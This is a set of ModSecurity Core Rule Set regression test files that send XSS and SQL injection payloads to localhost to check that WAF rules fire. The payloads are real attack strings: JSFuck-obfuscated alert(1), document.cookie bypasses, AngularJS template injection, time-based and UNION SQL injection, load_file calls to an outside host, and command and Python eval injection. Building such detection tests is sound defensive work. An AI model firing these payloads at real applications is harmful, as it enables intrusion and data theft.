941350.yaml description: Test rule 941350 tests: - test_title: 941350-1 desc: GH issue 1514 stages: - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: /xx?id=%25252bADw-script%25252bAD4- headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests output: log_contains: id "941350" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml000066400000000000000000000051401446122515100276210ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: None enabled: true name: 941360.yaml tests: - test_title: 941360-1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: 
"a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" # Payload represents "alert(1)" in JSFuck encoding version: HTTP/1.1 output: log_contains: id "941360" - test_title: 941360-2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "a=(![]+[])[+!+[]]" # Payload represents "a" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: log_contains: id "941360" - test_title: 941360-3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "a=+!![]" # Payload represents "1" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: log_contains: id "941360" 
modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml000066400000000000000000000106701446122515100276260ustar00rootroot00000000000000--- meta: author: "Andrea Menin" description: None enabled: true name: 941370.yaml tests: - test_title: 941370-1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-2 desc: "Bypass using comments in syntax" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-3 desc: "Bypass using JavaScript global variables" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: 
"a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%22%5Cx24%22%5D" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=%28document%29%5B%22cookie%22%5D" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" version: HTTP/1.1 output: log_contains: id "941370" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml000066400000000000000000000012731446122515100276260ustar00rootroot00000000000000--- meta: author: "Franziska Buehler" description: None enabled: true name: 941380.yaml tests: - test_title: 941380-1 desc: "AngularJS client side template injection detection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Accept: "*/*" User-Agent: "ModSecurity CRS 3 Tests" method: GET port: 80 uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' # 
/login?user={{constructor.constructor('alert(1)')()}} version: HTTP/1.1 output: log_contains: id "941380" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/000077500000000000000000000000001446122515100262635ustar00rootroot00000000000000modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml000066400000000000000000000132611446122515100277110ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: Various SQL injection tests enabled: true name: 942100.yaml tests: - test_title: 942100-1 desc: "Simple SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1234 OR 1=1" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-2 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=-1839' or '1'='1" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-3 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=-1839\" or \"1\"=\"2" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-4 desc: "Basic SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-5 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=EmptyValue' and 526=527" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-6 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=foo') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" - 
test_title: 942100-7 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-8 desc: "Simple SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-9 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-10 desc: "Advanced SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "1'||(select extractvalue(xmltype('%toyop;" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-11 desc: "Simple function call" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=sleep(20)" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-12 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-13 desc: "Advanced injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\" | type %SystemDrive%\\\\config.ini | \"" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-14 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"unittests@coreruleset.org\"')) 
and (select*from(select(sleep(5)))x) --" version: HTTP/1.0 output: log_contains: id "942100" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml000066400000000000000000000044241446122515100277130ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: Various SQL injection tests enabled: true name: 942101.yaml tests: - test_title: 942101-1 desc: "Simple SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/1234%20OR%201=1" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-2 desc: "Basic SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-3 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/EmptyValue'%20and%20526=527" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-4 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-5 desc: "Simple function call" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/sleep(20)" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-6 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" version: HTTP/1.0 output: log_contains: id "942101" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml000066400000000000000000000007751446122515100277200ustar00rootroot00000000000000--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942110.yaml tests: - test_title: 942110-1 desc: "Common SQL Injection Testing" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 # NB: false positives: /?var=\'\' data: "var=%27%27" version: HTTP/1.0 output: log_contains: id "942110" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml000066400000000000000000000206751446122515100277220ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942120.yaml tests: - test_title: 942120-1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=blahblah&var2=LIKE%20NULL" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=RegExp" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ">>" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%26%26" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "<<" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST 
port: 80 uri: "/" data: "%21%3D" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "||" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "XOR" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%3C%3D" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "IS NULL" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "in (0,1)" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "in (2147483647,-1)" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%3C%3D%3E" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: 
"regexp" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "RLIKE" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "<>" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "+IN+%28815914%2C+815913%29%0A" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay= in ( Aa,- Ab-, and Ac)" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST 
port: 80 uri: "/" data: "%3E%3D" version: HTTP/1.0 output: log_contains: id "942120" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml000066400000000000000000000055621446122515100277210ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron and Allan Boll" description: None enabled: true name: 942130.yaml tests: - test_title: 942130-1 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" version: HTTP/1.0 output: no_log_contains: id "942130" - test_title: 942130-2 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=1=1" version: HTTP/1.1 output: log_contains: id "942130" - test_title: 942130-3 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=11=1" version: HTTP/1.1 output: no_log_contains: id "942130" - test_title: 942130-4 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=1=11" version: HTTP/1.1 output: no_log_contains: id "942130" - test_title: 942130-5 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=11!=1" version: HTTP/1.1 output: log_contains: id "942130" - test_title: 942130-6 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=1!=11" version: HTTP/1.1 output: log_contains: id "942130" - test_title: 942130-7 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=11!=11" version: HTTP/1.1 output: no_log_contains: id "942130" - test_title: 942130-8 
desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=b,1=1" version: HTTP/1.1 output: log_contains: id "942130" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml000066400000000000000000000153211446122515100277140ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942140.yaml tests: - test_title: 942140-1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?sql_table=pg_catalog" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "INFORMATION_SCHEMA" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "database(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "db_name(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "DaTaBasE(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "InFoRmaTioN_ScHemA" version: HTTP/1.0 output: log_contains: id "942140" - 
test_title: 942140-7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "DB_NAME(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "tempdb" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "msdb" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "mysql.db" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-11 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "MSysAccessObjects" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "Northwind" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "northwind" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SCHEMA_NAME" version: HTTP/1.0 output: log_contains: id "942140" - 
test_title: 942140-15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "DATABASE(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "schema_name" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "information_schema" version: HTTP/1.0 output: log_contains: id "942140" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml000066400000000000000000000201661446122515100277200ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: Various SQL injection tests enabled: true name: 942150.yaml tests: - test_title: 942150-1 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-2 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1' and sleep(9) #" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-3 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1(select*from(select(sleep(5)))d)" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-4 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=unittests@coreruleset.org' 
(function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-5 stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test')and (select*from(select(sleep(10)))d)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-6 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=foo'||(select extractvalue(xmltype('%tocob;" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-7 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=config.ini' and sleep(91) #" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-8 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-9 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=None')and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-10 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-11 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=file:/init.ini'.sleep(12).'" version: HTTP/1.0 output: log_contains: id 
"942150" - test_title: 942150-12 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-13 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-14 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-15 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-16 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test{${sleep(12)}}" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-17 desc: "Advanced injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-18 desc: "Advanced injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: 